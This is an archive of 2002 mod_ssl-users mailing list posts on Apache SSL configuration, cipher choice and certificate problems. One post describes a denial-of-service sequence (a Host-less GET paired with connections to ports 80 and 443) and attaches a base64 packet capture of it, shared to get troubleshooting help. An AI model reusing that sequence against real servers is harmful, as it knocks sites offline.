These software packages are provided free of charge. It uses strong 
cryptography that is regulated by export/import/use restrictions in some

parts of the world.

PLEASE NOTE THAT EXPORT/IMPORT/USE OF STRONG CRYPTOGRAPHY SOFTWARE, 
PROVIDING CRYPTOGRAPHY HOOKS OR EVEN JUST COMMUNICATING TECHNICAL 
DETAILS ABOUT CRYPTOGRAPHY SOFTWARE IS ILLEGAL IN SOME PARTS OF THE 
WORLD. SO, WHEN YOU IMPORT THIS PACKAGE TO YOUR COUNTRY, RE-DISTRIBUTE 
IT FROM THERE OR EVEN JUST EMAIL TECHNICAL SUGGESTIONS OR SOURCE PATCHES

TO THE AUTHOR OR OTHER PEOPLE YOU ARE STRONGLY ADVISED TO PAY CLOSE 
ATTENTION TO ANY EXPORT/IMPORT/USE LAWS WHICH APPLY TO YOU. WE NOR THE 
AUTHORS OF THE REPRESENTED SOFTWARE PACKAGES ARE OR WILL BE HELD LIABLE 
FOR ANY VIOLATIONS YOU MAKE. BE CAREFUL, IT IS YOUR RESPONSIBILITY.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Oct 13 19:51:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA09361; Sun, 13 Oct 2002 19:50:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA09350; Sun, 13 Oct 2002 19:49:38 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 0F3034CE638; Sun, 13 Oct 2002 19:49:38 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4D5B6286D6; Sun, 13 Oct 2002 19:49:03 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pikababy.gropep.com.au id TAA08764; Sun, 13 Oct 2002 19:06:54 +0200 (MET DST)
Received: from gropep.com (dialup-129.gropep.com.au [150.101.50.129])
	by pikababy.gropep.com.au (8.11.6/8.11.6) with ESMTP id g9DH6kP74245
	for ; Mon, 14 Oct 2002 02:36:46 +0930 (CST)
	(envelope-from daniel.moore@gropep.com)
Message-ID: <3DA9A85D.20902@gropep.com>
Date: Mon, 14 Oct 2002 02:37:41 +0930
From: Daniel Moore 
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: a big hairy problem....
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Daniel Moore 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hi I need some help with this big prob I got. I have a working mod_ssl
setup. That is until I put in another virtual server with a rewrite rule.
Apache spits the dummy and says I don't have the rewrite module installed,
which is a lie because when I do a http -l I can see it. So I thought I
would attack the problem the other way. I put the virtual host with the
rewrite rule after the mod ssl virtual host and Apache spits when it gets
to the SSLEngine bit... and it was just working! In fact when both http
conf files are seperated they *both* work! I am about to pull my hair out,
can someone help? In fact when I put the mod ssl stuff in and the other
virtual host it all works if I leave out the rewrite stuff...

I am running a recent release of freebsd, apache 1.3.24 with the
concurrant version of mod_sll and OpenSLL. Here is a copy of my httpd.conf
file for anyone kind enough to look:

I'll be so happy to get some clues, thanks.
D.

ps Sorry if this comes through twice it didn't seem to send the first time...

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 14 10:38:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA06892; Mon, 14 Oct 2002 10:37:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from serv01.aet.tu-cottbus.de id KAA06878; Mon, 14 Oct 2002 10:36:21 +0200 (MET DST)
Received: from localhost (localhost [127.0.0.1])
	by serv01.aet.tu-cottbus.de (Postfix) with ESMTP id 8F0ED2402
	for ; Mon, 14 Oct 2002 10:36:20 +0200 (METDST)
Received: by serv01.aet.tu-cottbus.de (Postfix, from userid 11019)
	id 3A86823DE; Mon, 14 Oct 2002 10:36:16 +0200 (METDST)
Date: Mon, 14 Oct 2002 10:36:15 +0200
From: Lutz Jaenicke 
To: modssl-users@modssl.org
Subject: Re: SSLCipherSuite order is not respected
Message-ID: <20021014083615.GA22492@serv01.aet.tu-cottbus.de>
Mail-Followup-To: modssl-users@modssl.org
References: <3DA55F91.81491FDB@ubizen.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3DA55F91.81491FDB@ubizen.com>
User-Agent: Mutt/1.4i
Organization: BTU Cottbus, Allgemeine Elektrotechnik
X-Virus-Scanned: by AMaViS snapshot-20011031
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Lutz Jaenicke 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Thu, Oct 10, 2002 at 01:08:01PM +0200, Carl D'Halluin wrote:
> Now one could expect that the server takes the cipher from this intersection, which is the first in its SSLCipherSuite settings, or maybe that the server takes the strongest common cipher. However
> this is not true: the server just takes the first supported cipher requested by the client.

This is the default behaviour of OpenSSL.

> The funny thing is that most clients first present their weak ciphers, and next their strong ciphers. This makes that all strong browsers speaking with most ssl servers, will always speak a very weak
> cipher.
> 
> I think mod_ssl or openssl should be tuned to use their SSLCipherSuite config to choose the cipher, instead of using the client config.
> 
> I found a reference on this in a thread from 1998
> http://marc.theaimsgroup.com/?l=apache-ssl&m=91231283120300&w=2
> 
> Apparently this is not considered a problem, although I consider this a change request for mod_ssl and/or openssl.

OpenSSL as of 0.9.7 does have the necessary option to change this default.
Set SSL_OP_CIPHER_SERVER_PREFERENCE with SSL_CTX_set_options().
However: as far as I am aware, mod_ssl does not yet have a httpd.conf option
to enable this flag.

Best regards,
	Lutz
-- 
Lutz Jaenicke                             Lutz.Jaenicke@aet.TU-Cottbus.DE
http://www.aet.TU-Cottbus.DE/personen/jaenicke/
BTU Cottbus, Allgemeine Elektrotechnik
Universitaetsplatz 3-4, D-03044 Cottbus
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 14 10:52:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA07193; Mon, 14 Oct 2002 10:51:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.sds.no id KAA07189; Mon, 14 Oct 2002 10:51:03 +0200 (MET DST)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id <47B4JAJC>; Mon, 14 Oct 2002 10:50:57 +0200
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: Strange server failiure!
Date: Mon, 14 Oct 2002 10:50:55 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C2735E.CECAC330"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C2735E.CECAC330
Content-Type: text/plain;
	charset="iso-8859-1"

Hey.
 
Last night, when logrotate HUP'ed some of our apache servers with mod_ssl,
like it does every night, we got a strange error:
[Sun Oct 13 04:02:01 2002] [error] mod_ssl: Init: (conan.os.ergo.no:443)
Ops, no RSA or DSA server certificate found?!

[Sun Oct 13 04:02:01 2002] [error] mod_ssl: Init: (conan.os.ergo.no:443) You
have to perform a *full* server restart when you added o

r removed a certificate and/or key file

 

The strange thing is that we have neither removed or added certificates. Is
this a bug in mod_ssl? We have mod_ssl 2.8.7-4.on one, and 2.8.7-6 on the
other.

Is this a known bug? It makes no sense to me....

Med vennlig hilsen, 

Torvald Baade Bringsvor

ErgoIntegration AS 
Postboks 4364 Nydalen, 0402 Oslo 
Telefon 23 14 50 00, Telefaks 23 14 50 01 
Direkte tlf.nr. 23 14 52 72, Mobilnr 979 80 494
www.ergogroup.no 

 

------_=_NextPart_001_01C2735E.CECAC330
Content-Type: text/html;
	charset="iso-8859-1"









Hey.


 


Last night, when 
logrotate HUP'ed some of our apache servers with mod_ssl, like it does every 
night, we got a strange error:




[Sun Oct 13 04:02:01 2002] [error] mod_ssl: Init: 
(conan.os.ergo.no:443) Ops, no RSA or DSA server certificate found?!


[Sun Oct 13 04:02:01 2002] [error] mod_ssl: Init: 
(conan.os.ergo.no:443) You have to perform a *full* server restart when you 
added o


r removed a certificate and/or key file


 


The strange thing is 
that we have neither removed or added certificates. Is this a bug in mod_ssl? We 
have mod_ssl 2.8.7-4.on one, and 2.8.7-6 on the other.


Is this a known bug? 
It makes no sense to me....


Med vennlig hilsen, 


Torvald Baade Bringsvor


ErgoIntegration AS 
Postboks 4364 Nydalen, 0402 Oslo 
Telefon 23 14 50 00, Telefaks 23 14 50 01 
Direkte tlf.nr. 23 14 52 72, Mobilnr 979 80 494
www.ergogroup.no 


 


------_=_NextPart_001_01C2735E.CECAC330--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 14 10:55:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id KAA07284; Mon, 14 Oct 2002 10:54:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mx0.gmx.net id KAA07259; Mon, 14 Oct 2002 10:53:38 +0200 (MET DST)
Received: (qmail 29241 invoked by uid 0); 14 Oct 2002 08:53:32 -0000
Date: Mon, 14 Oct 2002 10:53:31 +0200 (MEST)
From: Josef Kandlhofer 
To: modssl-users@modssl.org
MIME-Version: 1.0
Subject: Triple DES
X-Priority: 3 (Normal)
X-Authenticated-Sender: #0000557956@gmx.net
X-Authenticated-IP: [62.116.24.70]
Message-ID: <31616.1034585611@www49.gmx.net>
X-Mailer: WWW-Mail 1.5 (Global Message Exchange)
X-Flags: 0001
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Josef Kandlhofer 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

is it possible to use triple DES encryption with SSL?? 

Because my SSL always uses RC4, although the server and the client speaks
only triple DES?!?!

Thank you!!!!!

Josef Kandlhofer

-- 
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
NEU: Mit GMX ins Internet. Rund um die Uhr für 1 ct/ Min. surfen!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 06:49:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id GAA13746; Tue, 15 Oct 2002 06:48:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from smtp5.andrew.cmu.edu id GAA13741; Tue, 15 Oct 2002 06:48:04 +0200 (MET DST)
Received: from NETMON2.net.cmu.edu (NETMON2.net.cmu.edu [128.2.4.12])
	(user=apw2 mech=KERBEROS_V4 (0 bits))
	by smtp5.andrew.cmu.edu (8.12.3.Beta2/8.12.3.Beta2) with ESMTP id g9F4m2Is008595
	for ; Tue, 15 Oct 2002 00:48:02 -0400
Date: Tue, 15 Oct 2002 00:48:03 -0400 (EDT)
From: Andrew Widdowson 
X-X-Sender: apw2@netmon2.net.cmu.edu
To: modssl-users@modssl.org
Subject: RFC 2459 'Subject Alternative Name'
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Andrew Widdowson 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Greetings,

	Is there any preexisting way to expose the X509v3 Subject
Alternative Name data that a client certificate provides into the
environment variable space (or a similar space)? Specially, I
want to obtain the rfc822Name. Currently I am using the deprecated Subject
Distinguished Name EmailAddress attribute, and would prefer the newer
Alternative Name.
	Any advice, pointers, or patches are greatly appreciated.

	-Andrew Widdowson
--
Carnegie Mellon University Computing Services
Network Development Group
http://www.net.cmu.edu/groups/netdev/

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 14:25:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA27783; Tue, 15 Oct 2002 14:24:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id OAA27763; Tue, 15 Oct 2002 14:24:01 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B3DFE4CE752; Tue, 15 Oct 2002 14:24:01 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 73D0E286B8; Tue, 15 Oct 2002 14:15:33 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sparc.hpl.lib.tx.us id WAA29905; Mon, 14 Oct 2002 22:09:50 +0200 (MET DST)
Received: from hpl.lib.tx.us (232hpl30.hpl.lib.tx.us [204.235.232.30])
	by sparc.hpl.lib.tx.us (8.9.3/8.9.3) with ESMTP id PAA21164
	for ; Mon, 14 Oct 2002 15:01:57 -0500 (CDT)
Message-ID: <3DAB2419.431B997C@hpl.lib.tx.us>
Date: Mon, 14 Oct 2002 15:07:54 -0500
From: yi kong 
X-Mailer: Mozilla 4.77 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: certificate questions
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: yi kong 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We have a Solaris Web server with Apache 1.3.12, OpenSSL 0.9.6 and
ModSSL 2.6.6. Last week the own signed certificate expired. I tried to
renew or recreate one, but not successful. Because we don't have
ramden-number-create package, SUN suggest, instead,  to install the
patch 105710-01, which is a big patch and many file and complicated
procedures. I try to create the server key and server crt from other
Sparc machine. I copped the two file to server and restart the apache.
The certificate expire message still show up and the message is old,
different with the one I typed while create the crt.

Any suggestion will be appreciated

Yi Kong
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 17:16:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA04531; Tue, 15 Oct 2002 17:15:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from imo-m06.mx.aol.com id RAA04466; Tue, 15 Oct 2002 17:14:13 +0200 (MET DST)
From: camccuk@netscape.net
Received: from camccuk@netscape.net
	by imo-m06.mx.aol.com (mail_out_v34.13.) id m.1b3.2763e15 (16216)
	 for ; Tue, 15 Oct 2002 11:14:05 -0400 (EDT)
Received: from  netscape.net (mow-m08.webmail.aol.com [64.12.184.136]) by air-in01.mx.aol.com (v89.12) with ESMTP id MAILININ14-1015111405; Tue, 15 Oct 2002 11:14:05 -0400
Date: Tue, 15 Oct 2002 11:14:05 -0400
To: modssl-users@modssl.org
Subject: RE: Using subjectAltName
MIME-Version: 1.0
Message-ID: <7B08F8AA.78307983.001D8163@netscape.net>
X-Mailer: Atlas Mailer 2.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: camccuk@netscape.net
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hate to repost but I'm completely stumped by this one and have noticed a few related questions for this recently...

>Sadly I've lost the original mail but someone a few weeks ago mentioned the use of the subjectAltName extension to store domain names in a certificate - can anyone clarify how to do this? 

Actually it was, er... Harald Koch - sorry to drag you in Harald but do you have details of how to do this or were you using some proprietary solution (Netscape's server products?)

This is the config that doesn't work..

>[ req ]
>default_bits                                    = 1024
>default_keyfile                                 = server.key
>distinguished_name                              = req_distinguished_name
>string_mask                                     = nombstr
>req_extensions                                  = v3_req
>x509_extensions                                 = usr_cert
>[ req_distinguished_name ]
>countryName                                     = Country Name (2 letter code)
>countryName_default                             = GB
>countryName_min                                 = 2
>countryName_max                                 = 2
>stateOrProvinceName                             = State or Province Name (full name)
>localityName                                    = Locality Name (eg, city)
>0.organizationName                              = Organization Name (eg, company)
>organizationalUnitName                  = Organizational Unit Name (eg, section)
>commonName                                      = Common Name (eg, www.domain.com)
>commonName_max                                  = 64
>emailAddress                                    = Email Address
>emailAddress_max                                = 40
>[ v3_req ]
>nsCertType                                      = server
>basicConstraints                                = critical,CA:false
>[ user_cert ]
>subjectAltName                                  = DNS:our.domain.co.uk
>
>This always results in "Error Loading extension section usr_cert". A couple of quesions: do I need this DNS prefix? Does it matter what I call the extensions section? How do I specify multiple host names? I found an example which led me to use the x509_extensions tag instead of extensions - what is the difference?

Once again, eternal gratitude awaits anyone who can shine any light on this...

cam
-----------------------------------------
camccuk@netscape.net


__________________________________________________________________
The NEW Netscape 7.0 browser is now available. Upgrade now! http://channels.netscape.com/ns/browsers/download.jsp 

Get your own FREE, personal Netscape Mail account today at http://webmail.netscape.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 17:18:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA04594; Tue, 15 Oct 2002 17:17:10 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from communicate.01com.com id RAA04578; Tue, 15 Oct 2002 17:16:57 +0200 (MET DST)
Received: from 01com.com (DEV_STRAKHOV_98 [10.0.0.43]) by communicate.01com.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)
	id SVJ7V4JX; Tue, 15 Oct 2002 11:11:13 -0400
Message-ID: <3DAC309F.4057B568@01com.com>
Date: Tue, 15 Oct 2002 11:13:35 -0400
From: Sergey Strakhov 
X-Mailer: Mozilla 4.61 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
CC: Pedro Nascimento 
Subject: Problem in mod_ssl 2.8.10 + Apache 1.3.26/WIn32 ?
Content-Type: multipart/mixed;
 boundary="------------2BB4DD66E84461DD37F29238"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sergey Strakhov 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------2BB4DD66E84461DD37F29238
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit

Hello,

We are experiencing problems with our Win32 Apache 1.3.26 with mod_ssl
2.8.10 + openssl 0.9.6b running on Windows 2000.
It is a sort of DoS attacks that make our web site totally inaccessible.

One of those attacks was captured with Ethereal. The dump is attached.

As you can see, the attack is accomplished through both HTTP (80) and
HTTPS (443) ports.
First, the connection is opened to the HTTP port, then it is opened to
the HTTPS port.
Then a malformed HTTP/1.1 GET request (with no Host: header) is sent to
the HTTP port.
Then both connections are closed without waiting for the response from
the web server.
As a result, the web site stops responding on both HTTP and HTTPS ports.

The error log usually contains records like:

[..time..] [error] [client ..] client sent HTTP/1.1 request without
hostname (see RFC2616 section 14.23): /
[..time..] [error] Server ran out of threads to serve requests. Consider
raising the ThreadsPerChild setting

Is this problem related to mod_ssl anyhow?
Will an upgrade to Apache 1.3.27 + mod_ssl 2.8.11 + openssl 0.9.6g solve
the problem?

Regards


--------------2BB4DD66E84461DD37F29238
Content-Type: application/octet-stream;
 name="attack.tcpdump"
Content-Disposition: attachment;
 filename="attack.tcpdump"
Content-Transfer-Encoding: base64

1MOyoQIABAAAAAAAAAAAAP//AAABAAAANuehPSP3CgBKAAAASgAAAABQutaB6gDAAjaDAAgA
RQAAPNR3AAAwBghEP8Wtf8CoABQEWAG7wdT/kgAAAACgAhbQfZMAAAIEBSoEAggKEs0r5QAA
AAABAwMANuehPTz7CgBOAAAATgAAAADAAjaDAABQutaB6ggARQAAQI5IQACABr5uwKgAFD/F
rX8BuwRYZlHzHcHU/5OwEkMiI+MAAAIEBbQBAwMAAQEICgAAAAAAAAAAAQEEAjjnoT32BgIA
QgAAAEIAAAAAULrWgeoAwAI2gwAIAEUAADTUeAAAMAYISz/FrX/AqAAUBFgBu8HU/5NmUfMe
gBAW0FHhAAABAQgKEs0sUgAAAAA556E9UPAAAEoAAABKAAAAAFC61oHqAMACNoMACABFAAA8
SJkAADAGlCI/xa1/wKgAFAUWAFDCDWRoAAAAAKACFtAYJgAAAgQFKgQCCAoSzSzxAAAAAAED
AwA556E9B/EAAE4AAABOAAAAAMACNoMAAFC61oHqCABFAABAjklAAIAGvm3AqAAUP8WtfwBQ
BRZmW6Ohwg1kabASQyIO9AAAAgQFtAEDAwABAQgKAAAAAAAAAAABAQQCOeehPUfGCQBCAAAA
QgAAAABQutaB6gDAAjaDAAgARQAANEiaAAAwBpQpP8Wtf8CoABQFFgBQwg1kaWZbo6KAEBbQ
PAcAAAEBCAoSzS09AAAAADnnoT178QkAVAAAAFQAAAAAULrWgeoAwAI2gwAIAEUAAEZImwAA
MAaUFj/FrX/AqAAUBRYAUMINZGlmW6OigBgW0F1MAAABAQgKEs0tPQAAAABHRVQgLyBIVFRQ
LzEuMQ0KDQo556E9PMcLAEIAAABCAAAAAMACNoMAAFC61oHqCABFAAA0jkpAAIAGvnjAqAAU
P8WtfwBQBRZmW6Oiwg1ke4AQQxCt7AAAAQEICgBfYWkSzS09SeehPW1uAABCAAAAQgAAAABQ
utaB6gDAAjaDAAgARQAANEicAAAwBpQnP8Wtf8CoABQFFgBQwg1ke2Zbo6KAERbQ1E8AAAEB
CAoSzTMZAF9haUnnoT3TbgAAQgAAAEIAAAAAwAI2gwAAULrWgeoIAEUAADSOS0AAgAa+d8Co
ABQ/xa1/AFAFFmZbo6LCDWR8gBBDEKd3AAABAQgKAF9iARLNMxlJ56E9FYoAAEIAAABCAAAA
AFC61oHqAMACNoMACABFAAA01HkAADAGCEo/xa1/wKgAFARYAbvB1P+TZlHzHoARFtBLGQAA
AQEIChLNMxkAAAAASeehPXWKAABCAAAAQgAAAADAAjaDAABQutaB6ggARQAANI5MQACABr52
wKgAFD/FrX8BuwRYZlHzHsHU/5SAEEMivGYAAAEBCAoAX2IBEs0zGQ==
--------------2BB4DD66E84461DD37F29238--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 17:29:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA04862; Tue, 15 Oct 2002 17:28:12 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fermat.math.technion.ac.il id RAA04857; Tue, 15 Oct 2002 17:27:54 +0200 (MET DST)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.1) with ESMTP id g9FFRoiX005598;
	Tue, 15 Oct 2002 17:27:50 +0200 (IST)
Received: (from nyh@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id g9FFRorr005597;
	Tue, 15 Oct 2002 17:27:50 +0200 (IST)
Date: Tue, 15 Oct 2002 17:27:50 +0200
From: "Nadav Har'El" 
To: modssl-users@modssl.org
Cc: Pedro Nascimento 
Subject: Re: Problem in mod_ssl 2.8.10 + Apache 1.3.26/WIn32 ?
Message-ID: <20021015152750.GA5469@fermat.math.technion.ac.il>
References: <3DAC309F.4057B568@01com.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3DAC309F.4057B568@01com.com>
User-Agent: Mutt/1.4i
Hebrew-Date: 9 Heshvan 5763
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nadav Har'El" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Tue, Oct 15, 2002, Sergey Strakhov wrote about "Problem in mod_ssl 2.8.10 + Apache 1.3.26/WIn32 ?":
> We are experiencing problems with our Win32 Apache 1.3.26 with mod_ssl
> 2.8.10 + openssl 0.9.6b running on Windows 2000.
> It is a sort of DoS attacks that make our web site totally inaccessible.

>From your description it sounds like this is the worm described in:

http://www.cert.org/advisories/CA-2002-27.html

However, to the best of my knowledge, this worm cannot infect your Windows -
it will only kill your sever.

> Will an upgrade to Apache 1.3.27 + mod_ssl 2.8.11 + openssl 0.9.6g solve
> the problem?

Yes, I think it will.


-- 
Nadav Har'El                        |     Tuesday, Oct 15 2002, 9 Heshvan 5763
nyh@math.technion.ac.il             |-----------------------------------------
Phone: +972-53-245868, ICQ 13349191 |Tact is the art of making a point without
http://nadav.harel.org.il           |making an enemy.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 17:31:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA04997; Tue, 15 Oct 2002 17:30:17 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from radish.cambridge.redhat.com id RAA04882; Tue, 15 Oct 2002 17:29:21 +0200 (MET DST)
Received: from radish.cambridge.redhat.com (localhost.localdomain [127.0.0.1])
	by radish.cambridge.redhat.com (8.12.5/8.12.5) with ESMTP id g9FFVEBq005751;
	Tue, 15 Oct 2002 16:31:14 +0100
Received: (from jorton@localhost)
	by radish.cambridge.redhat.com (8.12.5/8.12.5/Submit) id g9FFVBkn005749;
	Tue, 15 Oct 2002 16:31:11 +0100
X-Authentication-Warning: radish.cambridge.redhat.com: jorton set sender to jorton@redhat.com using -f
Date: Tue, 15 Oct 2002 16:31:11 +0100
From: Joe Orton 
To: camccuk@netscape.net
Cc: modssl-users@modssl.org
Subject: Re: Using subjectAltName
Message-ID: <20021015153111.GC5567@redhat.com>
Mail-Followup-To: camccuk@netscape.net, modssl-users@modssl.org
References: <74D066C2.5DAD7684.001D8163@netscape.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <74D066C2.5DAD7684.001D8163@netscape.net>
User-Agent: Mutt/1.4i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi - you might be better of asking these questions on the openssl-users
list.

On Thu, Oct 10, 2002 at 10:18:48AM -0400, camccuk@netscape.net wrote:
..
> x509_extensions                                 = usr_cert

This looks like a simple typo, the above requires a section called
'usr_cert', yet you've actually named the section "user_cert".

> [ user_cert ]
> subjectAltName                                  = DNS:our.domain.co.uk
> 
> This always results in "Error Loading extension section usr_cert". A 
> couple of quesions: do I need this DNS prefix? 

Yes.

> Does it matter what I call the extensions section?

No, AFAIK, so long as it doesn't conflict with any other section

> How do I specify multiple host names?

subjectAltName = DNS:our.domain.co.uk, DNS:another.domain.co.uk, DNS:...

> I found an example which led me to use the x509_extensions tag instead 
> of extensions - what is the difference?

Pass.

Regards,

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 15 19:16:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA09755; Tue, 15 Oct 2002 19:15:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA09670; Tue, 15 Oct 2002 19:14:41 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 988E54CE75C; Tue, 15 Oct 2002 19:14:41 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B3D4528815; Tue, 15 Oct 2002 19:14:10 +0200 (CEST)
